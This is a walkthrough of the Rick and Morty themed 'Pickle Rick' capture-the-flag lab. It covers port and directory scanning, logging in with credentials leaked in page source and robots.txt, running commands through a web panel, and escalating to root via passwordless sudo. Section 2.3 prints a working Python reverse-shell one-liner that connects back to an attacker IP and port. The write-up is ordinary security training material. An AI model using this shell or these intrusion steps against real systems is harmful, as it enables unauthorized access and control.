🥒Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

1. Reconnaissance

1.1 Nmap

• Using nmap to find open ports and services. nmap -sC -sV -oN {outputfile} {IP}

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 08:13 EDT
Nmap scan report for 10.10.161.188
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 60:dd:fc:03:86:a4:84:77:2c:4b:30:97:0d:a4:54:42 (RSA)
|   256 3b:b7:5a:17:1a:66:36:79:4c:3f:5d:88:7c:f6:c5:65 (ECDSA)
|_  256 1c:6a:00:90:ef:aa:43:fb:93:a1:36:6d:1e:d1:f8:a5 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

We find ports 22 (ssh) and port 80 (http) open

1.2 Gobuster

Using gobuster to brue-force web directories gobuster dir -u http://{ip} -w {wordlist} -o {outputfile} -x php,txt,html,css,js

/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 315] [--> http://10.10.161.188/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]

1.3 Website

Upon navigating to the website,

• Inspecting source code we see,

`Note to self, remember username!`

> Username: R1ckRul3s

Directories

Checking out the directories we got from Gobuster

/assets

• fail.gif

• picklerick.gif

• portal.jpg

• rickandmorty.jpeg

Nothing hidden in the images

/robots.txt

Wubbalubbadubdub

2. Gaining Access

2.1 /login.php

Using the username we got previously and hoping that the random gibberish from robots.txt might be the password,

Username:R1ckRul3s Password: Wubbalubbadubdub

..and,we're in

2.2 /portal.php (redirected to, after login)

We see a command panel right after login.Convenient huh?

• Inspecting source code, we see

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== which is a RABBIT HOLE (literally!!, keep on base64 decoding and you'll get the text "RABBIT HOLE")`

Upon further inspection, we are denied permission to all the other pages. Something about the real rick

• Running ls on command panel

• cat cannot run since it is disable(well, there goes our convenience)

WORKAROUND (thank you ,JOHN HAMMOND): using grep . (to grep for everything in a specific file) we find :

• Sup3rS3cretPickl3Ingred.txt

1st ingredient: xx. xxxxxxx xxxx

• Clue.txt : Look around the file system for the other ingredient

2.3 Reverse Shell

We can try a reverse shell to get a more stable connection since navigating the file system through the given command panel can be cumbersome.

• netcat reverse shell not working.

• Python3 found(which python3)

  • python reverse shell from pentest monkey with netcat listening on the attacker's machine and running this command in the command panel

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' // change ip and port to your listener		

Stabilizing the reverse-shell using python3 pty(not required for now,but is a cool trick)

• Second ingredient can be found in /home/rick/second ingredients

  2nd ingredient: x xxxxx xxxx

3 Privilege Escalation

• Running sudo -l, we find that www-data can run as root without password. So sudo bash gives root access - We find 3rd ingredient.txt in /root/3rd.txt

  3rd ingredient: xxxxx xxxxx